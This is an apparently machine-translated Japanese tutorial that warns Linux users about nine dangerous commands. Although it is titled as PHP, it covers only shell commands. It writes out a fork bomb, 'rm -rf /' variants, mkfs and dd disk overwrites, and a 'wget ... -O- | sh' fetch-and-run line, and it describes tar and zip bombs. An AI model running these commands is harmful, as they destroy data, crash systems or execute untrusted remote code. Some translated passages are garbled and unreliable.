常に注意しなければならない 9 つの PHP コマンドとコード_PHP チュートリアル
- WBOYオリジナル
- 2016-07-13 10:13:29822ブラウズ
常に注意しなければならない 9 つの PHP コマンドとコード
Linux シェル/ターミナル コマンドは非常に強力で、単純なコマンドでもフォルダー、ファイル、またはパス フォルダーが削除される可能性があります。
場合によっては、Linux が要求もせずにコマンドを直接実行し、さまざまなデータ情報が失われることがあります。
一般的に、新しい Linux ユーザーは Web 上でこれらのコマンドを実行することをお勧めします。もちろん、このコードを書いた人の中にはそう考えない人もいます。一度書いてしまえば、これはもはや冗談ではないからです。
ここでは、システムに有害な Linux コードをいくつか集めて、それらを回避できるようにしました。覚えておいてください: このコードは非常に危険であり、さらに有害になるように変更される可能性もあります。
他に注意すべき点: 一部のコマンドは、Ubuntu で sudo プレフィックスが付いている場合にのみ有害です。 Linux の他のディストリビューションは、ルート ディレクトリ コマンドとして使用すると有害になります。
1. Linux フォークボムコマンド
:(){ :|: & };: Fork Bomb として知られる、Linux システムに対するサービス拒否攻撃です。 :(){ :|: & };: は bash 関数です。実行される限り、システムがフリーズするまで繰り返されます。
この問題を解決するには、システムを再起動する必要があります。したがって、Linux インターフェイスでこのコマンドを実行するときは、必ず注意してください。
2. Mv フォルダー/Dev/Null コマンド
mvfolder/dev/null も危険なコマンドです。 Dev/null または null デバイスは、このデバイス ファイルに書き込まれたすべてのデータを削除するデバイス ファイルです。ただし、操作プロンプトでは、書き込み操作が正常に実行されたことが示されます。これは、私たちがよくビット バックまたはブラック ホールと呼ぶものです。
3. Rm -Rf コマンド
rm -rf コマンドは、Linux システムのフォルダーとその内容をすばやく削除できます。正しい使い方を知らないと、ただ泣くだけです。
m-rf コマンドの最も一般的な組み合わせと選択肢を以下に示します:
- rmコマンド: Linuxシステム内のファイルを削除します
- rm -f コマンド: プロンプトを表示せずにファイル内の読み取り専用ファイルを削除します
- rm -r コマンドはフォルダーの内容をループします
- rm -d コマンド: 空のディレクトリを削除します。ディレクトリが空でない場合、操作は実行されません。 rm -rf/ コマンド: ルート ディレクトリ内のすべてのコンテンツとサブフォルダー (書き込み保護されたファイルを含む) コマンドを強制的に削除します。
- rm -rf* コマンド: 現在のディレクトリ (現在の作業ディレクトリ) とサブフォルダー内のすべてを強制的に削除します
- rm -rf コマンド: 現在のフォルダー ディレクトリ/サブディレクトリ内のすべての内容を強制的に削除します。 rm -r と同じです。[^.]*
4.Mkfsコマンド
mkfs の機能を知らない場合、これは危険なコマンドでもあります。mkfs の後に記述されたコマンドはフォーマットされ、空の Linux ファイル システムに置き換えられます。ハードドライブをフォーマットするために管理者権限が必要なコマンドは次のとおりです:
- mkfs
- mkfs.ext3
- mkfs.bfs
- mkfs.ext2
- mkfs.minix
- mkfs.msdos mkfs.reiserfs
- mkfs.vfat
5. タール爆弾
tar コマンドは、複数のファイルを .tar 形式の 1 つのファイル (アーカイブ ファイル) にまとめるために使用されます。テープ アーカイブ (タール) 爆弾は彼によって作成できます。圧縮すると、このアーカイブ ファイルによって、新しいディレクトリではなく現在のディレクトリに表示される、同じ名前のファイルが何万も生成されます。
tar ファイルを受信するときは、定期的に新しい保護されたディレクトリを作成し、受信した tar ファイルを解凍する前にこのディレクトリに配置すると、tar 爆弾の被害者になることを避けることができます。
6.DDコマンド
Ddコマンドはハードディスクのパーティションをコピー&変更するために使用されます。間違った場所で使用すると危険です。dd コマンドは以下にリストされています:
- dd if=/dev/hda of=/dev/hdb
- dd if=/dev/hda of=/dev/sdb
- dd if=something of=/dev/hda
- dd if=something of=/dev/sda
7. シェルスクリプトコード
場合によっては、だまされてシェル スクリプト ファイルを渡され、それをダウンロードして実行するよう求められることがあります。スクリプトには悪意のあるコードまたは危険なコードが含まれている可能性があります。コマンド形式は次のようになります: wget http://some_malicious_source -O- | wget は sh ナロースクリプトを実行するときにスクリプトをダウンロードします。
8. 悪意のあるソースコード
もしかしたら誰かがソースコードを渡してコンパイルさせてくれるかもしれません。コードは通常のコードである可能性がありますが、大規模なソース コードの中に悪意のあるコードが隠されている可能性があります。その場合、システムは脆弱です。それを避けるにはどうすればよいでしょうか?信頼できるソースからのソース コードのみが受け入れられ、コンパイルされます。
9. 減圧爆弾
あなたは zip ファイルを受け取り、この一見小さなファイル (おそらく KB ほどのサイズ) を解凍するように求められました。実際、圧縮ファイルの小さいサイズには、高度に圧縮されたデータが含まれています。ファイルが解凍される限り、数百 GB のデータが抽出されます。この時点で、大きすぎるデータがハードディスクをいっぱいにし、ダウンタイムが発生する可能性が非常に高くなります。それを避けるにはどうすればよいでしょうか?古いことわざにあるように、安っぽくしないで、どんな文書でも受け入れてください。信頼できる情報源からの文書を受け入れてください。